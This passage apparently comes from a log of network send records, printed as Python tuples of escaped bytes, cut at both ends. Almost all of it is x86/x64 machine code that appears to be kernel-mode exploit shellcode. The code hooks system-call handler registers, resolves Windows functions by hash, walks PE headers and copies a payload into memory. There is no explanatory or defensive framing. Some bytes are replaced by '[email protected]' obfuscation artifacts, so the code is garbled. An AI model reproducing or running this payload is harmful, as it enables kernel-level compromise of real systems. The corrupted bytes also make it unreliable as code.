\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 18, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 19, 